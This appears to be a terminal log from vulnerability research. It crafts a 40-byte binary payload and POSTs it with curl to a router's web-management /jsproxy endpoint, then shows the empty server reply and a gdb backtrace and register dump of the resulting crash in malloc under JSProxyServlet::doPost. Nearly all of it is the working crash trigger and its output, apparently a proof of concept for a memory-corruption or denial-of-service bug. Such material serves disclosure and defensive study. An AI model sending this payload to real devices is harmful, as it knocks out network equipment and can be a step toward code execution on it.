albinolobster@mournland:~$ echo -en "\x00\x00\x00\x00\x00\x00\x00\x00\x5e\x5e\x5e\x5e\x5e\x5e\x5e\x5e\x5e\x5e\x5e\x5e\x5e\x5e\x5e\x5e\x5e\x5e\x5e\x5e\x5e\x5e\x5e\x5e\x5e\x5e\x5e\x5e\x5e\x5e\x5e\x5e" > /tmp/webfig-crash.bin
albinolobster@mournland:~$ curl -v -X POST -H "Content-Type: msg" --data-binary @/tmp/webfig-crash.bin http://10.12.70.1/jsproxy
Note: Unnecessary use of -X or --request, POST is already inferred.
* Trying 10.12.70.1:80...
* TCP_NODELAY set
* Connected to 10.12.70.1 (10.12.70.1) port 80 (#0)
> POST /jsproxy HTTP/1.1
> Host: 10.12.70.1
> User-Agent: curl/7.68.0
> Accept: */*
> Content-Type: msg
> Content-Length: 40
>
* upload completely sent off: 40 out of 40 bytes
* Empty reply from server
* Connection #0 to host 10.12.70.1 left intact
curl: (52) Empty reply from serverStack trace:
(gdb) bt
#0 0x7757d9a0 in ?? () from /lib/libc.so.0
#1 0x7757cd82 in malloc () from /lib/libc.so.0
#2 0x7752b71a in JSProxyServlet::doPost(Context&, Request const&, Response&) () from /nova/lib/www/jsproxy.p
#3 0x080582a7 in Servlet::doMethod(Context&, Request const&, Response&) ()
#4 0x08056700 in www::Connection::run() ()
#5 0x080568d5 in www::runConnection(void*) ()
#6 0x08057664 in Looper::threadLoop(Thread*) ()
#7 0x0805775b in ?? ()
#8 0x7777f435 in ?? () from /lib/libpthread.so.0
#9 0x7777a6d2 in clone () from /lib/libpthread.so.0
(gdb) info registers
eax 0x8063db8 134626744
ecx 0x55555594 1431655828
edx 0x1 1
ebx 0x7758a000 2002296832
esp 0x775520c8 0x775520c8
ebp 0x775520ec 0x775520ec
esi 0x7758bf00 2002304768
edi 0x8063dc8 134626760
eip 0x7757d9a0 0x7757d9a0
eflags 0x10283 [ CF SF IF RF ]
cs 0x73 115
ss 0x7b 123
ds 0x7b 123
es 0x7b 123
fs 0x0 0
gs 0x33 51